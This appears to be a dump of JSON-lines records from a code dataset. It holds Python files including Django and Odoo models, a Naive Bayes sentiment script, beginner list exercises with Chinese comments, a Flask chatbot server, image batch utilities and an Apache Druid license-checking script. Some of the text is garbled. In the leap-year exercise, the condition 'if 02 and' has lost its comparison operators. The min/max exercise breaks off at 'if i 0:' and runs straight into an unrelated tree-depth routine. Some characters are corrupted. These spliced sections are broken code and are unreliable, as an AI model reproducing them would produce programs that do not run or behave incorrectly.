models.IntegerField(db_index=True, default=0, verbose_name=u'业务id')\r\n admin = models.IntegerField(db_index=True, default=0, verbose_name=u'管理员')\r\n write = models.IntegerField(db_index=True, default=0, verbose_name=u'���权限')\r\n\r\n class Meta:\r\n unique_together = ((\"user_id\", \"work_id\"),)\r\n verbose_name = u\"用户权限\"\r\n verbose_name_plural = u\"用户权限\"","sub_path":"web_mgr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"603941119","text":"from odoo import models, fields, api, _\n\nclass KategoriObat(models.Model):\n _name=\"nur_klinik.kategori_obat\"\n\n name=fields.Char(\n string=\"Kategori Obat\", required=True\n )\n\n deskripsi = fields.Text(\n string='Deskripsi Kategori Obat',\n )\n\nclass Obat(models.Model):\n _name=\"nur_klinik.obat\"\n\n name = fields.Char(\n string=\"Nama\",required=True,\n )\n\n kategori_obat_id = fields.Many2one(\n string='Kategori Obat',\n comodel_name='nur_klinik.kategori_obat',\n ondelete='restrict',\n )\n\n harga = fields.Integer(\n string=\"Harga Obat\"\n )\n\n stok = fields.Integer(\n string=\"Persediaan\",\n )\n\n image = fields.Binary(\n string='Gambar',\n )\n \n\n deskripsi = fields.Text(\n string='Deskripsi Obat',\n )\n \nclass Resep(models.Model):\n _name = \"nur_klinik.resep\"\n\n name = fields.Many2one(\n string='Nama Obat',\n comodel_name='nur_klinik.obat',\n ondelete='restrict',\n )\n\n pengambilan_resep_id = fields.Many2one(\n 
string='pemeriksaan ID',\n comodel_name='nur_klinik.pengambilan_resep',\n ondelete='cascade',\n )\n\n desc_resep = fields.Text(\n string='Resep konsumsi Obat',\n help=\"Takaran yang diberikan kepada pasien\",\n required=True,\n )\n\n harga = fields.Integer(\n compute='_compute_harga', \n string='Harga')\n \n @api.depends('name')\n def _compute_harga(self):\n for record in self:\n record.harga = record.name.harga\n\n deskripsi = fields.Text(\n compute='_pick_deskripsi', \n string='Deskripsi')\n \n @api.depends('name')\n def _pick_deskripsi(self):\n for record in self:\n record.deskripsi = record.name.deskripsi\n \n qty = fields.Integer(\n string='Jumlah Beli',\n required=True,\n )\n\n total_harga = fields.Integer(\n compute='_compute_jumlah_harga', \n string='Jumlah Harga')\n \n @api.depends('qty')\n def _compute_jumlah_harga(self):\n for record in self:\n record.total_harga = record.qty * record.harga\n ","sub_path":"models/obat.py","file_name":"obat.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"226995225","text":"# -------------------------------------------------------\n# Assignment 2\n# Written by Zejun Zhang (40021402)\n# For COMP 472 Section AI-X – Summer 2021\n# Team: Sonic_1\n# --------------------------------------------------------\n\nimport yaml\nimport math\nimport numpy as np\nimport enchant\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n# ---------------- Tokenlize trainning data set -----------------\ncorpus_positive = []\ncorpus_negative = []\ncorpus = []\ntokenlize_list_positive = []\ntokenlize_list_negative = []\ntokenlize_list = []\nstop_list = []\nremove_list = []\ntotalPositiveNum = 0\ntotalNegativeNum = 0\n\n# Load reviews\nwith open('Demo/TrainingReviewSet.yaml','r') as yamlfile:\n# with open('t1.yaml','r') as yamlfile:\n database = yaml.safe_load(yamlfile) \n for k, v in database['Reviews'].items():\n # Append positive reviews in a list\n if database['Reviews'][k][\"p/n\"] == \"Positive\":\n if database['Reviews'][k][\"text\"] != \"default\":\n corpus_positive.append(database['Reviews'][k][\"text\"])\n\n # Append negative reviews in a list\n if database['Reviews'][k][\"p/n\"] == \"Negative\":\n if database['Reviews'][k][\"text\"] != \"default\":\n corpus_negative.append(database['Reviews'][k][\"text\"])\n\n # Append all reviews in a list\n corpus.append(database['Reviews'][k][\"text\"])\n\n# Load remove.txt into a list\nwith open(\"Demo/remove.txt\", \"r\") as remove:\n content = remove.read() \n stop_list = content.split()\n remove.close()\n\n# Convert to lowercase and tokenlize the words\nvectorizer_p = CountVectorizer(stop_words = stop_list)\nvectorizer_n = CountVectorizer(stop_words = stop_list)\nvectorizer = CountVectorizer(stop_words = stop_list)\n\ntoken_p = vectorizer_p.fit_transform(corpus_positive)\ntoken_n = vectorizer_n.fit_transform(corpus_negative)\ntoken = vectorizer.fit_transform(corpus)\n\n# Words list\ntokenlize_list_positive = vectorizer_p.get_feature_names()\ntokenlize_list_negative = vectorizer_n.get_feature_names()\ntokenlize_list = vectorizer.get_feature_names()\n\n# Get the frequency for each words in training set\nfrequency_list_p = token_p.toarray()\nfrequency_list_n = token_n.toarray()\n\n# Frequency list\nfrequency_p = frequency_list_p.sum(axis=0)\nfrequency_n = frequency_list_n.sum(axis=0)\n\n# Get total number of words in positive reviews\nfor x in frequency_p:\n totalPositiveNum += int(x)\n\n# Get total number of 
words in nagetive reviews\nfor y in frequency_n:\n totalNegativeNum += int(y)\n# ---------------------------------------------------------------\n\n# # --------------------- Update stopword.txt ---------------------\n# # We try to remove none english word, random typing and all the numbers with low probility\n# english_check = enchant.Dict(\"en_US\")\n\n# for x in tokenlize_list:\n# if not english_check.check(x):\n# remove_list.append(x)\n\n# # Load remove_list to a temp file\n# with open('remove.txt', 'a') as remove2:\n# for item in remove_list:\n# try:\n# remove2.write(\"%s\\n\" % item)\n# except:\n# pass\n# remove2.close()\n# # ---------------------------------------------------------------\n\n# ------ Compute conditional probility with smooth of 1 ---------\nwordsCount = 1\n\nwith open('Demo/model.txt', 'w') as model:\n for x in range(0, len(tokenlize_list_positive)):\n # Word only in positive reviews but not in negative reviews\n if tokenlize_list_positive[x] not in tokenlize_list_negative:\n prob_positive : float = 0.0\n prob_negative : float = 0.0\n\n prob_positive = (frequency_p[x] + 1)/(totalPositiveNum + len(tokenlize_list))\n prob_negative = 1/(totalNegativeNum + len(tokenlize_list))\n \n try:\n model.write(\"No.%d %s\\n\" % (wordsCount,tokenlize_list_positive[x]))\n model.write(str(frequency_p[x]) + \", \" + str(prob_positive) + \", \" + \n str(0) + \", \" + str(prob_negative) + \"\\n\")\n wordsCount += 1\n except:\n pass\n \n for y in range(0, len(tokenlize_list_negative)):\n # Word only in negative reviews but not in positive reviews\n if tokenlize_list_negative[y] not in tokenlize_list_positive:\n prob_positive : float = 0.0\n prob_negative : float = 0.0\n\n prob_positive = 1/(totalPositiveNum + len(tokenlize_list))\n prob_negative = (frequency_n[y] + 1)/(totalNegativeNum + len(tokenlize_list))\n \n try:\n model.write(\"No.%d %s\\n\" % (wordsCount,tokenlize_list_negative[y]))\n model.write(str(0) + \", \" + str(prob_positive) + \", \" + \n str(frequency_n[y]) + \", \" + str(prob_negative) + \"\\n\")\n wordsCount += 1\n except:\n pass\n\n for x in range(0, len(tokenlize_list_positive)):\n for y in range(0, len(tokenlize_list_negative)):\n # Word both have in positive reviews and negative reviews\n if tokenlize_list_positive[x] == tokenlize_list_negative[y]:\n prob_positive : float = 0.0\n prob_negative : float = 0.0\n\n prob_positive = (frequency_p[x] + 1)/(totalPositiveNum + len(tokenlize_list))\n prob_negative = (frequency_n[y] + 1)/(totalNegativeNum + len(tokenlize_list))\n \n model.write(\"No.%d %s\\n\" % (wordsCount,tokenlize_list_positive[x]))\n model.write(str(frequency_p[x]) + \", \" + str(prob_positive) + \", \" + \n str(frequency_n[y]) + \", \" + str(prob_negative) + \"\\n\")\n wordsCount += 1\n\n model.close()\n# ---------------------------------------------------------------","sub_path":"Demo/BuildModel.py","file_name":"BuildModel.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"83869286","text":"# 1.# 请用索引取出下面list的指定元素,遍历所有元素\n# # -*- coding: utf-8 -*-\ndef que1():\n L = [\n ['Apple', 'Google', 'Microsoft'],\n ['Java', 'Python', 'Ruby', 'PHP'],\n ['Adam', 'Bart', 'Lisa']]\n print(L[1][1])\n # for i in L:\n # # print(i)\n # for j in i:\n # print(j)\n\n for i in range(len(L)):\n # print(L[i])\n for j in range(len(L[i])):\n print(L[i][j])\n\n\n\n#\n# 2.\n# 将数组逆序输出(不是按大小,就是元素顺序逆序),使用两种方式。\na=[1,3,4,5,6,-1]\n# 方式一\n# a.reverse()\n# print(a)\n\n# 方式二\n# 
print(a[::-1])\n\n# 方式三 append\na_new=[]\n# for i in range(len(a)):\n# a_new.append(a[-1-i])\n# print(a_new)\n\n# for i in a:\n# a_new.append(a.pop())\n# print(a_new)\n\n\n# 方式四 insert\n# for i in a:\n# a_new.insert(0,i)\n# print(a_new)\n\n\n# 方式五:\n# a=[1,3,4,5,6,-1]\n# for i in range(int(len(a)/2)):\n# a[i],a[-1-i]=a[-1-i],a[i]\n# print(a)\n#\n# a_new=[]\n# for i in reversed(a):\n# a_new.append(i)\n# print(a_new)\n\n\n#\n#\n#\n# 3.\n# 输入某年某月���日,判断这一天是这一年的第几天?\n# 程序分析:以3月5日为例,应该先把前两个月的加起来,然后再加上5天即本年的第几天,特殊情况,闰年且输入月份大于2时需考虑多加一天:\n# 思路\n# 2018 - 8 - 23\n# days = 7\n# 月之前一共有多少天\n# days + 23\n#\n# 闰年:能够被4整除同时不能被100整除的年份,或者是能够被400整除\ndef que2():\n year=int(input(\"请输入年\"))\n month=int(input(\"请输入月\"))\n day=int(input(\"请输入日\"))\n months=[0,31,28,31,30,31,30,31,31,30,31,30,31]\n\n s=0\n if 02 and (year%4==0 and year %100!=0 or year%400==0):\n s+=1\n print(\"当前是今年的第{}天\".format(s))\n\n\n\n#\n# 4.\n# 求列表li = [1, 4, -5, 9, -6]\n# 的最大值与最小值,和与平均值。\nli = [1, 4, -5, 9, -6]\n# 思路:先取出一个值 就假设成最大值或者最小值,遍历列表跟所有元素比较,\n# 如果max<列表中的值,那么是真正的最大值,\n# 同样最小值也是\ndef que4():\n max=min=li[0]\n sums=0\n for i in li:\n if i>max:\n max=i\n if i 0:\n node,level = to_visit.pop(0)\n for child in node.children:\n to_visit.append([child,level+1])\n if max_height < level+1:\n max_height = level+1 \n \n return max_height\n","sub_path":"Python/559_01.py","file_name":"559_01.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522670527","text":"#!/usr/bin/env python3\nimport logging\nimport os\nimport threading\nimport time\n\nfrom werkzeug.contrib.profiler import ProfilerMiddleware\n\nfrom chatbot.analytics import start_batch_sender\nfrom chatbot.channels import google_chat_api\nfrom chatbot.config import CONF\nfrom chatbot.nlp_models import dialog\n\nlogger = logging.getLogger(__name__)\n\n\ndef _warmup():\n # Run loading get_agent in a loop to avoid having Heroku sleep\n # the process.\n def background_task():\n while 1:\n logger.debug(\"loading agent ...\")\n dialog.get_agent()\n\n interval = int(CONF.get_value('warming-up-agent-interval'))\n time.sleep(interval)\n t = threading.Thread(target=background_task)\n t.daemon = True\n t.start()\n\n\n_warmup()\nstart_batch_sender()\napp = google_chat_api.app\nif os.getenv('FLASK_PROFILE'):\n app.config['PROFILE'] = True\n app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[30])\n\n\ndef run():\n port = os.environ.get('PORT', 8080)\n app.run(port=port, debug=True)\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"chatbot/cli/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439254037","text":"# Made by Pedro Goncalves Mokarzel\n# while attending UW Bothell Student ID# 1576696\n# Made in 12/09/2019\n# Based on instruction in CSS 490, \n# taught by professor Dong Si\n\nfrom glob import glob\nfrom sklearn.model_selection import train_test_split \nimport numpy as np # Installed on DAIS 1\n\nfrom PIL import Image # Installed on DAIS 1\nfrom matplotlib import pyplot as plt # Installed on DAIS 1\n\n\n\n# Precondition: file name, size of batch to process, and path of output txt file, the top quantity for\n# both input and output, title for images\n# Postcondition: saves info to txt file\n# Saves the batch size\n# the data created for creating images and the one for just reading,\n# and validation\ndef create_names_with_batch(filePath, batch_size, 
save_info_path, quantity, title = ''):\n array = glob(filePath + '/*.flt')\n validate, test = train_test_split(array[0: quantity], test_size = 0.9)\n t1,t2 = train_test_split(test, test_size = 0.5)\n outFile = open(save_info_path + '/'+title+'trainning_data_b%d.txt'%(batch_size),\"a\")\n out_validate = open(save_info_path + '/'+title+'validate_data_b%d.txt'%(batch_size),\"a\")\n \n\n outFile.write((str)(batch_size) +'\\n')\n out_validate.write((str)(batch_size) +'\\n')\n # create validation data\n for k in range(0, len(validate)):\n out_validate.write(validate[k] + '\\n')\n out_validate.close()\n\n #Splits data at proper size\n true_size = len(t1)\n if(len(t1)>len(t2)):\n true_size = len(t2)\n true_size = true_size - (true_size%batch_size)\n # Saves info to outfile\n for i in range(0, true_size):\n outFile.write(t1[i] + '\\n')\n #Midpoint stop\n outFile.write('~\\n')\n \n for j in range(0,true_size):\n outFile.write(t2[j] + '\\n')\n outFile.close()\n # return x1,x2\n\n# Loads the names used for trainning in the batch formation specified by the txt file generated\n# from create_names_with_batch\n# Precondition: file for input\n# Postcondition: array with names of images to be processed\ndef load_train_text_names(file_path_in):\n outFile = open(file_path_in,\"r\")\n processing_batch = outFile.readline()\n processing_batch = processing_batch.replace('\\n','')\n processing_batch = int(processing_batch)\n arr1 = []\n arr2 = []\n arr1_t = []\n temp = outFile.readline()\n counter = 0\n # Reads until stop\n while temp !='~\\n': \n arr1_t.append(temp.replace('\\n',''))\n counter+=1\n temp = outFile.readline()\n if(counter == processing_batch):\n counter = 0\n arr1.append(arr1_t)\n del arr1_t\n arr1_t = []\n\n temp = outFile.readline()\n # Reads until end\n while temp:\n arr2.append(temp.replace('\\n','')) \n temp = outFile.readline()\n outFile.close()\n arr1 = np.asarray(arr1)\n arr2 = np.asarray(arr2)\n arr2 = arr2.reshape((-1,processing_batch))\n return arr1, arr2\n\n# Precondition: file of input to load variables from\n# Postcondition: array with variable giiven names to read\ndef load_validation_text_names(file_path_in):\n outFile = open(file_path_in,\"r\")\n processing_batch = outFile.readline()\n processing_batch = processing_batch.replace('\\n','')\n processing_batch = int(processing_batch)\n arr = []\n # Start iteration\n temp = outFile.readline()\n while temp:\n arr.append(temp.replace('\\n','')) \n temp = outFile.readline()\n outFile.close()\n arr = np.asarray(arr)\n arr = arr.reshape((-1,processing_batch))\n return arr\n\n# Precondition: file name to print array, and array of longs to be printed\n# Postcondition: Image save in file path\n# Based on 'Medical Imaging 2019: Physics of Medical Imaging' utils method I worked with during summer research with Professor Si\n# save_image method\ndef save_image(filePath, image):\n image.tofile(filePath + '.flt')\n\n scalef = np.amax(image)\n print_img = np.clip(255 * image/scalef, 0, 255).astype('uint8')\n print_img = np.squeeze(print_img)\n im = Image.fromarray(print_img.astype('uint8')).convert('L')\n im.save(filePath+'.png', 'png')\n\n# Precondition: name of file of image\n# Postcondition: array based on image\n# Based on 'Medical Imaging 2019: Physics of Medical Imaging' utils method I worked with during summer research with Professor Si\n# load_float method\ndef load_float(fileName):\n float_arr= np.fromfile(fileName, dtype= ' h2_start -> project_dependencies_start -> h3_start -> compile_start -> table_start -> row_start -> th_start / 
td_start -> th_end / td_end -> row_end -> table_end -> compile_end -> h3_end -> project_dependencies_end -> h2_end -> none\n\n attr_index = 0\n group_id = None\n artifact_id = None\n version = None\n classifier = None\n dep_type = None\n license = None\n state = \"none\"\n dep_to_license = None\n compatible_license_names = None\n include_classifier = False\n druid_module_name = None\n\n def __init__(self, druid_module_name, compatible_license_names):\n HTMLParser.__init__(self)\n self.state = \"none\"\n self.druid_module_name = druid_module_name\n self.compatible_license_names = compatible_license_names\n\n def parse(self, f):\n self.dep_to_license = {}\n self.feed(f.read())\n return self.dep_to_license\n\n def handle_starttag(self, tag, attrs):\n # print(\"current: {}, start tag: {}, attrs:{} \".format(self.state, tag, attrs))\n if self.state == \"none\":\n if tag == \"h2\":\n self.state = \"h2_start\"\n\n if self.state == \"h2_start\":\n if tag == \"a\":\n for attr in attrs:\n if attr[0] == \"name\" and (attr[1] == \"Project_Dependencies\" or attr[1] == \"Project_Transitive_Dependencies\"):\n self.state = \"project_dependencies_start\"\n self.include_classifier = False\n\n if self.state == \"h2_end\":\n if tag == \"h3\":\n self.state = \"h3_start\"\n\n if self.state == \"h3_start\":\n if tag == \"a\":\n for attr in attrs:\n if attr[0] == \"name\" and attr[1] == \"compile\":\n self.state = \"compile_start\"\n\n if self.state == \"h3_end\":\n if tag == \"table\":\n self.state = \"table_start\"\n\n if self.state == \"table_start\":\n if tag == \"tr\":\n self.state = \"row_start\"\n self.clear_attr()\n\n if self.state == \"row_end\":\n if tag == \"tr\":\n self.state = \"row_start\"\n self.clear_attr()\n\n if self.state == \"row_start\":\n if tag == \"td\":\n self.state = \"td_start\"\n elif tag == \"th\":\n self.state = \"th_start\"\n\n if self.state == \"th_end\":\n if tag == \"th\":\n self.state = \"th_start\"\n\n if self.state == \"td_end\":\n if tag == \"td\":\n self.state = \"td_start\"\n\n def handle_endtag(self, tag):\n # print(\"current: {}, end tag: {}\".format(self.state, tag))\n if self.state == \"project_dependencies_start\":\n if tag == \"a\":\n self.state = \"project_dependencies_end\"\n\n if self.state == \"h2_start\":\n if tag == \"h2\":\n self.state = \"h2_end\"\n\n if self.state == \"project_dependencies_end\":\n if tag == \"h2\":\n self.state = \"h2_end\"\n\n if self.state == \"compile_start\":\n if tag == \"a\":\n self.state = \"compile_end\"\n\n if self.state == \"compile_end\":\n if tag == \"h3\":\n self.state = \"h3_end\"\n\n if self.state == \"table_start\":\n if tag == \"table\":\n self.state = \"none\"\n\n if self.state == \"td_start\":\n if tag == \"td\":\n self.state = \"td_end\"\n self.attr_index = self.attr_index + 1\n\n if self.state == \"th_start\":\n if tag == \"th\":\n self.state = \"th_end\"\n\n if self.state == \"row_start\":\n if tag == \"tr\":\n self.state = \"row_end\"\n\n if self.state == \"th_end\":\n if tag == \"tr\":\n self.state = \"row_end\"\n\n if self.state == \"td_end\":\n if tag == \"tr\":\n self.state = \"row_end\"\n # print(json.dumps({\"groupId\": self.group_id, \"artifactId\": self.artifact_id, \"version\": self.version, \"classifier\": self.classifier, \"type\": self.dep_type, \"license\": self.license}))\n if self.group_id.find(\"org.apache.druid\") < 0:\n self.dep_to_license[get_dep_key(self.group_id, self.artifact_id, self.version)] = (self.license, self.druid_module_name)\n\n if self.state == \"row_end\":\n if tag == \"table\":\n 
self.state = \"none\"\n\n    def handle_data(self, data):\n        if self.state == \"td_start\":\n            self.set_attr(data)\n        elif self.state == \"th_start\":\n            if data.lower() == \"classifier\":\n                self.include_classifier = True\n\n    def clear_attr(self):\n        self.group_id = None\n        self.artifact_id = None\n        self.version = None\n        self.classifier = None\n        self.dep_type = None\n        self.license = None\n        self.attr_index = 0\n\n    def set_attr(self, data):\n        #print(\"set data: {}\".format(data))\n        if self.attr_index == 0:\n            self.group_id = data\n        elif self.attr_index == 1:\n            self.artifact_id = data\n        elif self.attr_index == 2:\n            self.version = get_version_string(data)\n        elif self.attr_index == 3:\n            if self.include_classifier:\n                self.classifier = data\n            else:\n                self.dep_type = data\n        elif self.attr_index == 4:\n            if self.include_classifier:\n                self.dep_type = data\n            else:\n                self.set_license(data)\n        elif self.attr_index == 5:\n            if self.include_classifier:\n                self.set_license(data)\n            else:\n                raise Exception(\"Unknown attr_index [{}]\".format(self.attr_index))\n        else:\n            raise Exception(\"Unknown attr_index [{}]\".format(self.attr_index))\n\n    def set_license(self, data):\n        if data.upper().find(\"GPL\") < 0:\n            if self.license != 'Apache License version 2.0':\n                self.license = self.compatible_license_names[data]\n\n\ndef print_log_to_stderr(string):\n    print(string, file=sys.stderr)\n\ndef build_compatible_license_names():\n    compatible_licenses = {}\n    compatible_licenses['Apache License, Version 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['The Apache Software License, Version 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache-2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache 2'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License 2'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache Software License - Version 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['The Apache License, Version 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License version 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License Version 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License Version 2'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License v2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License, 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache License, version 2.0'] = 'Apache License version 2.0'\n    compatible_licenses['Apache 2.0 License'] = 'Apache License version 2.0'\n\n    compatible_licenses['Public Domain'] = 'Public Domain'\n\n    compatible_licenses['BSD-2-Clause License'] = 'BSD-2-Clause License'\n    compatible_licenses['BSD-2-Clause'] = 'BSD-2-Clause License'\n    compatible_licenses['BSD 2-Clause license'] = 'BSD-2-Clause License'\n    compatible_licenses['BSD 2-Clause License'] = 'BSD-2-Clause License'\n\n    compatible_licenses['BSD-3-Clause License'] = 'BSD-3-Clause License'\n    compatible_licenses['New BSD license'] = 'BSD-3-Clause License'\n    compatible_licenses['BSD'] = 'BSD-3-Clause License'\n    compatible_licenses['The BSD License'] = 'BSD-3-Clause License'\n    compatible_licenses['BSD licence'] = 'BSD-3-Clause License'\n    compatible_licenses['BSD License'] = 'BSD-3-Clause License'\n    compatible_licenses['BSD-like'] = 'BSD-3-Clause 
License'\n compatible_licenses['BSD 3-clause'] = 'BSD-3-Clause License'\n compatible_licenses['The BSD 3-Clause License'] = 'BSD-3-Clause License'\n compatible_licenses['Revised BSD'] = 'BSD-3-Clause License'\n compatible_licenses['New BSD License'] = 'BSD-3-Clause License'\n compatible_licenses['3-Clause BSD License'] = 'BSD-3-Clause License'\n compatible_licenses['BSD 3-Clause'] = 'BSD-3-Clause License'\n compatible_licenses['BSD-3-Clause'] = 'BSD-3-Clause License'\n\n compatible_licenses['Unicode/ICU License'] = 'Unicode/ICU License'\n\n compatible_licenses['SIL Open Font License 1.1'] = 'SIL Open Font License 1.1'\n\n compatible_licenses['CDDL 1.1'] = 'CDDL 1.1'\n compatible_licenses['CDDL/GPLv2+CE'] = 'CDDL 1.1'\n compatible_licenses['CDDL + GPLv2 with classpath exception'] = 'CDDL 1.1'\n compatible_licenses['CDDL License'] = 'CDDL 1.1'\n compatible_licenses['COMMON DEVELOPMENT AND DISTRIBUTION LICENSE (CDDL) Version 1.0'] = 'CDDL 1.0'\n\n compatible_licenses['Eclipse Public License 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['The Eclipse Public License, Version 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['Eclipse Public License - Version 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['Eclipse Public License, Version 1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['Eclipse Public License v1.0'] = 'Eclipse Public License 1.0'\n compatible_licenses['EPL 1.0'] = 'Eclipse Public License 1.0'\n\n compatible_licenses['Eclipse Public License 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['The Eclipse Public License, Version 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['Eclipse Public License - Version 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['Eclipse Public License, Version 2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['Eclipse Public License v2.0'] = 'Eclipse Public License 2.0'\n compatible_licenses['EPL 2.0'] = 'Eclipse Public License 2.0'\n\n compatible_licenses['Eclipse Distribution License 1.0'] = 'Eclipse Distribution License 1.0'\n compatible_licenses['Eclipse Distribution License - v 1.0'] = 'Eclipse Distribution License 1.0'\n compatible_licenses['Eclipse Distribution License v. 
1.0'] = 'Eclipse Distribution License 1.0'\n compatible_licenses['EDL 1.0'] = 'Eclipse Distribution License 1.0'\n\n compatible_licenses['Mozilla Public License Version 2.0'] = 'Mozilla Public License Version 2.0'\n compatible_licenses['Mozilla Public License, Version 2.0'] = 'Mozilla Public License Version 2.0'\n\n compatible_licenses['Creative Commons Attribution 2.5'] = 'Creative Commons Attribution 2.5'\n\n compatible_licenses['Creative Commons CC0'] = 'Creative Commons CC0'\n compatible_licenses['CC0'] = 'Creative Commons CC0'\n\n compatible_licenses['The MIT License'] = 'MIT License'\n compatible_licenses['MIT License'] = 'MIT License'\n compatible_licenses['The MIT License (MIT)'] = 'MIT License'\n compatible_licenses['Bouncy Castle Licence'] = 'MIT License'\n compatible_licenses['SPDX-License-Identifier: MIT'] = 'MIT License'\n\n compatible_licenses['The Go license'] = 'The Go license'\n\n compatible_licenses['-'] = '-'\n return compatible_licenses\n\ndef get_dep_key(group_id, artifact_id, version):\n return (group_id, artifact_id, version)\n\ndef get_version_string(version):\n if type(version) == str:\n return version\n else:\n return str(version)\n\ndef find_druid_module_name(dirpath):\n ext_start = dirpath.find(\"/ext/\")\n if ext_start > 0:\n # Found an extension\n subpath = dirpath[(len(\"/ext/\") + ext_start):]\n ext_name_end = subpath.find(\"/\")\n if ext_name_end < 0:\n raise Exception(\"Can't determine extension name from [{}]\".format(dirpath))\n else:\n return subpath[0:ext_name_end]\n else:\n # Druid core\n return \"core\"\n\ndef check_licenses(license_yaml, dependency_reports_root):\n # Build a dictionary to facilitate comparing reported licenses and registered ones.\n # These dictionaries are the mapping of (group_id, artifact_id, version) to license_name.\n\n # Build reported license dictionary.\n reported_dep_to_licenses = {}\n compatible_license_names = build_compatible_license_names()\n for dirpath, dirnames, filenames in os.walk(dependency_reports_root):\n for filename in filenames:\n if filename == \"dependencies.html\":\n full_path = os.path.join(dirpath, filename)\n # Determine if it's druid core or an extension\n druid_module_name = find_druid_module_name(dirpath)\n print_log_to_stderr(\"Parsing {}\".format(full_path))\n with open(full_path, encoding=\"utf-8\") as report_file:\n parser = DependencyReportParser(druid_module_name, compatible_license_names)\n reported_dep_to_licenses.update(parser.parse(report_file))\n\n if len(reported_dep_to_licenses) == 0:\n raise Exception(\"No dependency reports are found\")\n\n print_log_to_stderr(\"Found {} reported licenses\\n\".format(len(reported_dep_to_licenses)))\n\n # Build registered license dictionary.\n registered_dep_to_licenses = {}\n skipping_licenses = {}\n with open(license_yaml, encoding='utf-8') as registry_file:\n licenses_list = list(yaml.load_all(registry_file, Loader=yaml.FullLoader))\n for license in licenses_list:\n if 'libraries' in license:\n for library in license['libraries']:\n if type(library) is not dict:\n raise Exception(\"Expected dict but got {}[{}]\".format(type(library), library))\n if len(library) > 1:\n raise Exception(\"Expected 1 groupId and artifactId, but got [{}]\".format(library))\n for group_id, artifact_id in library.items():\n if 'version' not in license:\n raise Exception(\"version is missing in {}\".format(license))\n if 'license_name' not in license:\n raise Exception(\"name is missing in {}\".format(license))\n if 'skip_dependency_report_check' in license and 
license['skip_dependency_report_check']:\n                            if 'version' not in license:\n                                version = \"-\"\n                            else:\n                                version = get_version_string(license['version'])\n                            skipping_licenses[get_dep_key(group_id, artifact_id, version)] = license\n                        else:\n                            registered_dep_to_licenses[get_dep_key(group_id, artifact_id, get_version_string(license['version']))] = compatible_license_names[license['license_name']]\n\n    if len(registered_dep_to_licenses) == 0:\n        raise Exception(\"No registered licenses are found\")\n\n    # Compare licenses in registry and those in dependency reports.\n    mismatched_licenses = []\n    missing_licenses = []\n    unchecked_licenses = []\n    # Iterate through the registered licenses and check whether each matches the reported one.\n    for key, registered_license in registered_dep_to_licenses.items():\n        if key in reported_dep_to_licenses: # key is (group_id, artifact_id, version)\n            reported_license_druid_module = reported_dep_to_licenses[key]\n            reported_license = reported_license_druid_module[0]\n            druid_module = reported_license_druid_module[1]\n            if reported_license is not None and reported_license != \"-\" and reported_license != registered_license:\n                group_id = key[0]\n                artifact_id = key[1]\n                version = key[2]\n                mismatched_licenses.append((druid_module, group_id, artifact_id, version, reported_license, registered_license))\n\n    # If any mismatched licenses were found, report them all; the script exits with an error after all checks.\n    if len(mismatched_licenses) > 0:\n        print_log_to_stderr(\"Error: found {} mismatches between reported licenses and registered licenses\".format(len(mismatched_licenses)))\n        for mismatched_license in mismatched_licenses:\n            print_log_to_stderr(\"druid_module: {}, groupId: {}, artifactId: {}, version: {}, reported_license: {}, registered_license: {}\".format(mismatched_license[0], mismatched_license[1], mismatched_license[2], mismatched_license[3], mismatched_license[4], mismatched_license[5]))\n        print_log_to_stderr(\"\")\n\n    # Let's find missing licenses, which are reported but missing in the registry.\n    for key, reported_license_druid_module in reported_dep_to_licenses.items():\n        if reported_license_druid_module[0] != \"-\" and key not in registered_dep_to_licenses and key not in skipping_licenses:\n            missing_licenses.append((reported_license_druid_module[1], key[0], key[1], key[2], reported_license_druid_module[0]))\n\n    if len(missing_licenses) > 0:\n        print_log_to_stderr(\"Error: found {} missing licenses. These licenses are reported, but missing in the registry\".format(len(missing_licenses)))\n        for missing_license in missing_licenses:\n            print_log_to_stderr(\"druid_module: {}, groupId: {}, artifactId: {}, version: {}, license: {}\".format(missing_license[0], missing_license[1], missing_license[2], missing_license[3], missing_license[4]))\n        print_log_to_stderr(\"\")\n\n    # Let's find unchecked licenses, which are registered but missing in the report.\n    # These licenses should be checked manually.\n    for key, registered_license in registered_dep_to_licenses.items():\n        if key not in reported_dep_to_licenses:\n            unchecked_licenses.append((key[0], key[1], key[2], registered_license))\n        elif reported_dep_to_licenses[key][0] == \"-\":\n            unchecked_licenses.append((key[0], key[1], key[2], registered_license))\n\n    if len(unchecked_licenses) > 0:\n        print_log_to_stderr(\"Warn: found {} unchecked licenses. 
